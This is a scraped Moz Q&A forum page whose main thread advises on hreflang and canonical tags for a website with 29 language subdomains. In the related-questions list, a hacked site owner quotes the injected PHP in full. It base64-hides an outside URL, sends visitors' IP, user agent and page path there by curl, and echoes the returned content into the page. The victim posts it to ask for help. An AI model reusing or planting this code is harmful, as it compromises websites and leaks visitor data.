Hreflang/Canonical Inquiry for Website with 29 different languages
-
Hello,
So I have a website (www.example.com) that has 29 subdomains (es.example.com, vi.example.com, it.example.com, etc).
Each subdomain has the exact same content for each page, completely translated in its respective language.
I currently do not have any hreflang/canonical tags set up.
I was recently told that this (below) is the correct way to set these tags up
-For each subdomain (es.example.com/blah-blah for this example), I need to place the hreflang tag pointing to the page the subdomain is on (es.example.com/blah-blah), in addition to every other 28 subdomains that have that page (it.example.com/blah-blah, etc). In addition, I need to place a canonical tag pointing to the main www. version of the website. So I would have 29 hreflang tags, plus a canonical tag.
When I brought this to a friends attention, he said that placing the canonical tag to the main www. version would cause the subdomains to drop out of the SERPs in their respective country search engines, which I obviously wouldn't want to do.
I've tried to read articles about this, but I end up always hitting a wall and further confusing myself. Can anyone help? Thanks!
-
_For each subdomain (es.example.com/blah-blah for this example), I need to place the hreflang tag pointing to the page the subdomain is on (es.example.com/blah-blah), in addition to every other 28 subdomains that have that page (it.example.com/blah-blah, etc). In addition, I need to place a canonical tag pointing to the main www. version of the website. So I would have 29 hreflang tags, plus a canonical tag. _
Everything correct but the canonical part (but maybe I misunderstood what you wrote).
If the different country targeting pages are in different languages, then you don't have to point the rel="canonical" to the main www. version. NOT AT ALL, because they are not identical. You will start seeing the search snippets of the URLs of those geo-targeted versions (shown because of the hreflang) using the title tag and meta description of the www. version page. So, for instance, the search snippet of the Italian version having the Italian URL but everything else in English. If you need to use the rel="canonical" it should be self-referential (if not another in same cases, but of the same subdomain)
-
Hi,
Probably the easiest solution in your case is to use the geo-targeting settings in Google Webmaster tools (but only if each of your subdomains is targeting a specific country - not a specific language).
If you want to use hreflang - there is quite a good post on it on Moz (http://moz.com/blog/hreflang-behaviour-insights) - must admit I personally never used it.
rgds,
Dirk
-
If your translations are automated, Google requests that you don't index them, but it sounds like you've created fully translated, static pages. Here's Google's info on that, "Q: Can I use automated translations?
A: Yes, but they must be blocked from indexing with the “noindex” robots meta tag. We consider automated translations to be auto-generated content, so allowing them to be indexed would be a violation of our Webmaster Guidelines." Maybe this is where someone had confusion... Anyways, here's their larger FAQ on it: https://sites.google.com/site/webmasterhelpforum/en/faq-internationalisation. Fully done translations are considered canonical within their own languages, so no need to point to the www version as canonical.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Website in capital letters
Hello, Is website in capital letters affect SEO ?? or we can apply with it ?? please help thnx in advance..!!
White Hat / Black Hat SEO | | iepl20040 -
Besides technical error improvement, best way to increase organic traffic to movie review website
I have a friend's website, ShowBizJunkies, that they work very had at improving and providing great content. I put the website in a more modern theme, increased speed (wpengine, but maxed out with cdn, caching, image optimization, etc) But now I'm struggling how to suggest further improving the seo structure or building backlinks. I know trying to come up for those terms like "movie reviews" and many similar are ridiculously difficult, and requires tons of high quality backlinks. What is my lowest hanging fruit here, any suggestions? My current plan is: 1. Fix technical errors 2. Create more evergreen content 3. Work on timing of article release for better Google News coverage 4. More social sharing, sharing on Tumblr, Reddit, Facebook Groups, G+ Communities, etc 5. Build backlinks via outreach to tv show specific sites, movie fan sites, actor fan sites (interviews)
White Hat / Black Hat SEO | | JustinMurray1 -
Do dead/inactive links matter?
In cleaning up the backlink profile for my parent's website, I've come across quite a few dead links. For instance, the links in the comments here: http://www.islanddefjam.com/artist/news_single.aspx?nid=4726&artistID=7290 Do I need to worry about these links? I assume if the links are no longer active, and hence not showing up in webmaster or moz reports, I can probably ignore them, but I'm wondering if I should try and get them removed regardless? I've read that google is increasingly taking into account references (i.e. website mentions that are not links) and I don't know if inactive spam links might leave a bad impression of a website. Am I being overly paranoid? I imagine disavowing them would be pointless as you can't attach a nofollow tag to an inactive link.
White Hat / Black Hat SEO | | mgane0 -
Cloaking/Malicious Code
Does anybody have any experience with software for identifying this sort of thing? I was informed by a team we are working with that our website may have been compromised and I wanted to know what programs people have used to identify cloaking attempts and/or bad code. Thanks everybody!
White Hat / Black Hat SEO | | HashtagHustler0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Footer Link in International Parent Company Websites Causing Penalty?
Still waiting to look at the analytics for the timeframe, but we do know that the top keyword dropped on or about April 23, 2012 from the #1 ranking in Google - something they had held for years, and traffic dropped over 15% that month and further slips since. Just looked at Google Webmaster Tools and see over 2.3MM backlinks from "sister" compainies from their footers. One has over 700,000, the rest about 50,000 on average and all going to the home page, and all using the same anchor text, which is both a branded keyword, as well as a generic keyword, the same one they ranked #1 for. They are all "nofollows" but we are trying to confirm if the nofollow was before or after they got hit, but regardless, Google has found them. To also add, most of sites are from their international sites, so .de, .pl, .es, .nl and other Eurpean country extensions. Of course based on this, I would assume the footer links and timing, was result of the Penguin update and spam. The one issue, is that the other US "sister" companies listed in the same footer, did not see a drop, in fact some had increase traffic. And one of them has the same issue with the brand name, where it is both a brand name and a generic keyword. The only note that I will make about any of the other domains is that they do not drive the traffic this one used to. There is at least a 100,000+ visitor difference among the main site, and this additional sister sites also listed in the footer. I think I'm on the right track with the footer links, even though the other sites that have the same footer links do not seem to be suffering as much, but wanted to see if anyone else had a different opinion or theory. Thanks!
White Hat / Black Hat SEO | | LeverSEO
Jen Davis0 -
Cross linking websites of the same company, is it a good idea
As a user I think it is beneficial because those websites are segmented to answer to each customer needs, so I wonder if I should continue to do it or avoid it as much as possible if it damages rankings...
White Hat / Black Hat SEO | | mcany0 -
Website Hacked now it's not Ranking
One of my domains was hacked right before I took over managing it. The hacker created around 100 links for simply grotesque things. After I took over I erased the entire site, rebuilt from scratch, new server (inmotion), rewrote every page, robots.txt every offending page, and even 301 just in case 404s were hurting me. I am now almost a month in and I have seen zero movement on anything rankings based. This is not a bad domain it was registered in 2008 and has a few decent citations because of the Doc's medical license. They registered for BBB in November and have a 30 year old listing citation from them based on business establishment. I must be going crazy but it's not ranking for anything except the homepage. I didn't know Google could hold a grudge for so long. The only ranking I can sometimes achieve is through Google Places which still has to compete with tough domains. I've already put in a reconsideration request and received a response stating the following: We reviewed your site and found no manual actions by the webspam team that might affect your site's ranking in Google. There's no need to file a reconsideration request for your site, because any ranking issues you may be experiencing are not related to a manual action taken by the webspam team. Just check it for yourself I know it's a work in progress but I'm not even considered relevant on page 50! And the crap links are still indexed!! A search for a keyword I'm aiming for with my client's name followed after gives me no results. I am currently using wordpress, yoast xml, and single keyword focusses. My market is tough but no way I can not rank for the keyword and my name.
White Hat / Black Hat SEO | | allenrocks0